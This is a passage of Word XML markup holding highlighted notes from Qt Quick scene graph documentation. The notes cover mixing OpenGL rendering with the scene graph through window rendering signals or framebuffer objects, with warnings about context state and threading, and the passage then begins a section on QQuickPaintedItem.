          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integrating OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> content: by </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>calling OpenGL commands direc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tly</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and by </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creating a textured node</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the scene graph.</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By </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connecting</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the</w:t>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2025" w:anchor="beforeRendering" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() and</w:t>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2026" w:anchor="afterRendering" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::afterRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() signals, applications can </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>make OpenGL calls directly</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the same context as the scene graph is rendering to. As the signal names indicate, the user can then render OpenGL content either under a Qt Quick scene or over it. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of integrating in this manner is that </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no extra framebuffer nor memory is needed to perform the rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>downside</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that Qt Quick decides when to call the signals and this is the only time the OpenGL application is allowed to draw.</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The</w:t>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2027" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph - OpenGL Under QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example gives an example on how to use these signals.</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other </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alternative</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to create a</w:t>
      </w:r>
      <w:r w:rsidR="00BD2950" w:rsidRPr="00E63735">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2028" w:history="1">
        <w:r w:rsidRPr="00E63735">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickFramebufferObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, render into it, and let it be displayed in the scene graph as a texture</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2029" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph - Rendering FBOs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">example shows how this can be done. It is also </w:t>
      </w:r>
      <w:r w:rsidRPr="00323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible to combine multiple rendering contexts and multiple threads</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create content to be displayed in the scene graph. The</w:t>
      </w:r>
      <w:r w:rsidR="00323054">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2030" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph - Rendering FBOs in a thread</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00323054">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>examples show how this can be done.</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323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00323054">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When mixing OpenGL content with scene graph rendering, it is important the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does not leave the OpenGL context in a state with buffers bound, attributes enabled, special values in the z-buffer or stencil-buffer or similar</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Doing so can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="00323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unpredictable</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> behavior.</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323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00323054">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The OpenGL rendering </w:t>
      </w:r>
      <w:r w:rsidRPr="00323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">code must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00323054">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thread aware</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as the rendering might be happening outside the GUI thread.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="00450174" w:rsidRDefault="001113FB" w:rsidP="00E63735">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1657" w:name="custom-items-using-qpainter"/>
      <w:bookmarkStart w:id="1658" w:name="_Toc483000890"/>
      <w:bookmarkStart w:id="1659" w:name="_Toc483003881"/>
      <w:bookmarkStart w:id="1660" w:name="_Toc483604234"/>
      <w:bookmarkStart w:id="1661" w:name="_Toc483605454"/>
      <w:bookmarkEnd w:id="1657"/>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom Items using QPainter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1658"/>
      <w:bookmarkEnd w:id="1659"/>
      <w:bookmarkEnd w:id="1660"/>
      <w:bookmarkEnd w:id="1661"/>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1113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2031" w:history="1">
        <w:r w:rsidRPr="00974C4A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides a subclass,</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2032" w:history="1">
        <w:r w:rsidRPr="00974C4A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickPaintedItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which allows the users to render content using</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2033" w:history="1">
        <w:r w:rsidRPr="00974C4A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QPainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2034" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickPaintedItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uses an </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indirect 2D surface</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to render its content, either using </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
